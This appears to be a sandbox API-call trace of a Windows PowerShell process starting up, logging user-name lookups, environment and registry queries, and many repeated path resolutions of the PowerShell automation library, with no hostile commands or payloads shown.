	[0224.098] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x29d560 | out: lpFileInformation=0x29d560*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.098] SetErrorMode (uMode=0x1) returned 0x1
	[0224.099] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0224.099] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0224.099] CoTaskMemFree (pv=0x46eac0) 
	[0224.690] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29d4a0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.706] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents", nBufferLength=0x105, lpBuffer=0x29d5c0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\aETAdzjz\\Documents", lpFilePart=0x0) returned 0x1b
	[0224.706] SetErrorMode (uMode=0x1) returned 0x1
	[0224.707] GetFileAttributesExW (in: lpFileName="C:\\Users\\aETAdzjz\\Documents" (normalized: "c:\\users\\aetadzjz\\documents"), fInfoLevelId=0x0, lpFileInformation=0x29d820 | out: lpFileInformation=0x29d820*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x2335d4a0, ftCreationTime.dwHighDateTime=0x1d2f180, ftLastAccessTime.dwLowDateTime=0x7eb942d0, ftLastAccessTime.dwHighDateTime=0x1d543d1, ftLastWriteTime.dwLowDateTime=0x7eb942d0, ftLastWriteTime.dwHighDateTime=0x1d543d1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0224.707] SetErrorMode (uMode=0x1) returned 0x1
	[0230.131] CoTaskMemAlloc (cb=0x804) returned 0x1b760740
	[0230.131] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x1b760740, nSize=0x29db88 | out: lpNameBuffer="YKYD69Q\\aETAdzjz", nSize=0x29db88) returned 0x1
	[0230.131] CoTaskMemFree (pv=0x1b760740) 
	[0230.131] CoTaskMemAlloc (cb=0x204) returned 0x419e90
	[0230.131] GetUserNameW (in: lpBuffer=0x419e90, pcbBuffer=0x29dbc8 | out: lpBuffer="aETAdzjz", pcbBuffer=0x29dbc8) returned 1
	[0230.131] CoTaskMemFree (pv=0x419e90) 
	[0230.133] ReportEventW (hEventLog=0x1b9c0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2d70540*="Available", lpRawData=0x2d702d0) returned 1
	[0230.601] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0230.601] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.602] CoTaskMemFree (pv=0x46eac0) 
	[0230.603] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0230.603] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0230.603] CoTaskMemFree (pv=0x46eac0) 
	[0230.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d690, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.605] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d5e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.608] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.609] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0230.609] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0230.609] CoTaskMemFree (pv=0x46eac0) 
	[0230.609] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0230.609] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="\\Users\\aETAdzjz") returned 0xf
	[0230.609] CoTaskMemFree (pv=0x46eac0) 
	[0230.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.609] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.610] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.611] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.611] GetCurrentProcessId () returned 0xc4
	[0230.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.612] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.614] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.617] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.620] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d5a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.622] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.623] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d4f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.624] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.627] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.629] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x29dba8 | out: phkResult=0x29dba8*=0x190) returned 0x0
	[0230.629] RegQueryValueExW (in: hKey=0x190, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29db2c, lpData=0x0, lpcbData=0x29db28*=0x0 | out: lpType=0x29db2c*=0x1, lpData=0x0, lpcbData=0x29db28*=0x56) returned 0x0
	[0230.629] CoTaskMemAlloc (cb=0x5a) returned 0x47c200
	[0230.629] RegQueryValueExW (in: hKey=0x190, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x29dafc, lpData=0x47c200, lpcbData=0x29daf8*=0x56 | out: lpType=0x29dafc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x29daf8*=0x56) returned 0x0
	[0230.630] RegCloseKey (hKey=0x190) returned 0x0
	[0230.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.633] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d560, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d5b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.640] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.642] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29d500, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0230.645] CoTaskMemAlloc (cb=0x104) returned 0x46eac0
	[0230.645] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x46eac0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0231.272] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.274] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.275] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.277] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.278] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.280] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.281] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.283] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.284] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.285] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.287] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.288] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.290] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.291] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.293] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.294] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.296] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.297] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.299] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.300] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.301] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c540, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0231.303] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x29c5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
